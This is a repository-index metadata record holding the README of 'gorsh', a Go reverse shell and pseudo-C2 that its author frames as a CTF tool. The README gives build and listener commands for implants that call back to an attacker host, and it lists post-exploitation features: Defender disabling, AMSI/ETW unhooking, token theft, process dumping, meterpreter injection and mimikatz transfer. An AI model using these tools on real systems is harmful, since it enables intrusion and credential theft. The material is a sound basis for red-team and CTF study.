{"id":13825845,"url":"https://github.com/audibleblink/gorsh","last_synced_at":"2025-04-05T23:12:17.013Z","repository":{"id":43580284,"uuid":"147896803","full_name":"audibleblink/gorsh","owner":"audibleblink","description":"A Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface","archived":false,"fork":false,"pushed_at":"2024-12-12T00:35:53.000Z","size":9649,"stargazers_count":86,"open_issues_count":1,"forks_count":23,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-29T22:11:11.662Z","etag":null,"topics":["c2","golang","infosec","redteam","reverse-shell","reverseshell","security","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/audibleblink.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-09-08T03:15:37.000Z","updated_at":"2025-01-13T07:55:03.000Z","dependencies_parsed_at":"2024-01-07T22:48:51.422Z","dependency_job_id":"cfae9e22-ca10-4a23-b482-3c61410bc7ee","html_url":"https://github.com/audibleblink/gorsh","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/audibleblink%2Fgorsh/manifests","owner_url":"https://repos.
ecosyste.ms/api/v1/hosts/GitHub/owners/audibleblink","download_url":"https://codeload.github.com/audibleblink/gorsh/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247411239,"owners_count":20934653,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","golang","infosec","redteam","reverse-shell","reverseshell","security","security-tools"],"created_at":"2024-08-04T09:01:27.904Z","updated_at":"2025-04-05T23:12:16.980Z","avatar_url":"https://github.com/audibleblink.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具","Shell","security-tools"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"readme":"# gorsh\n\n[go]lang [r]everse [sh]ell\n\n[![forthebadge](https://forthebadge.com/images/badges/fuck-it-ship-it.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/no-ragrets.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/contains-technical-debt.svg)](https://forthebadge.com)\n[![forthebadge](https://forthebadge.com/images/badges/made-with-crayons.svg)](https://forthebadge.com)\n\n![](https://i.imgur.com/x51XH6K.png)\n[![asciicast](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x.svg)](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x)\n\n\n\n## Usage\n\nGenerate agents with:\n\n```bash\n# For the `make` targets, you only need 
the `LHOST` and `LPORT` environment variables.\n$ make {windows,macos,linux} LHOST=example.com LPORT=443\n```\n\nGenerate the server with:\n\n```bash\n# For the `make` targets, you only need the `LHOST` and `LPORT` environment variables.\n$ make server LPORT=443\n```\n\nGenerate everything with `make all LHOST=example.com LPORT=443`\n\n### Catching the shell\n\n```bash\nmake listen LPORT=443\n```\n\nTmux is a powerful terminal multiplexer with robust session/window/pane management.\nIt works better at managing multiple reverse shells than most shell managers I've seen.\nThe server binary creates a tmux session per host and a window per reverse shell binary invocation.\nIf you run the `spawn` command on a shell, a new window will open in the host's session, creating a \"tab\".\n\nTo catch a shell without `gorsh-server` and/or tmux, use:\n\n```bash\nsocat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE\n```\n\n## Features\n\n- Network scanner\n- Ligolo-ng tunnels for socks-less pivoting\n- Tab completion (dependent on exec method)\n- Duplicate your shells with 'spawn'\n\n### Windows\n- Disable Defender (or any process) by demoting process tokens to untrusted.\n- Execute Assembly - assemblies are gzipped \u0026 embedded. No hosting necessary\n- Unhook modules (w/ builtins for AMSI and ETW)\n- steal_token / revtoself\n- getsystem - if admin\n- minidump any process (uses comsvcs.dll)\n- shellcode injection\n- can fetch and inject meterpreter tcp and http stages\n    - or any other shellcode that follows the metasploit staging protocol\n    - first 4 bytes indicating the size of the following payload\n        - `[size][payload]`\n\n### Not Windows\n- `setuid`, useful for UID spoofing to bypass NFS \"ACLs\"\n- Enumeration scripts\n    - linpeas\n    - linenum\n\n### Execute Assembly\n\nAssemblies are gzipped and embedded within the implant. 
Since this is a CTF\nshell, I'm optimizing for ease of use and not tradecraft.\n\n- `make list-assemblies` will show available assemblies from Flangvik's SharpCollection project.\n- `make choose-assemblies` will bring up fzf, where you can filter and choose\nwhat assemblies you want embedded. They will be embedded at the next build\ntime.\n- To embed any other assembly not in SharpCollection, gzip it and copy it to `./pkg/execute_assembly/embed/`\n\n### Ligolo-NG Tunnels\n\nAgents have the ligolo client embedded. Run `make start-ligolo` to prepare\ninterfaces and run ligolo-ng. From an agent, run `pivot` and a callback should\nland within the ligolo interface. Select the callback in ligolo and `start`\nrouting. On your box, create a route to the remote network through the `tun`\ninterface and all traffic to that destination will now egress through ligolo.\n\n```bash\nip route add 172.16.43.0/24 dev ligolo\n```\n\n### File upload/download\n\nSince this is a reverse shell, only sharing its stdin/out/err through a network socket,\ntraditional methods of uploading and downloading files aren't available. There's\na Docker SMB server to bridge that gap. Configure the directories to be shared\nin the `Makefile`, then run `make start-smb`. If you wish to see logs so you\ncan monitor callbacks, use `make smblogs`. Windows implants understand UNC\npaths, so something like `cp //myip/tools/mimikatz.exe .` is possible.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faudibleblink%2Fgorsh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faudibleblink%2Fgorsh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faudibleblink%2Fgorsh/lists"}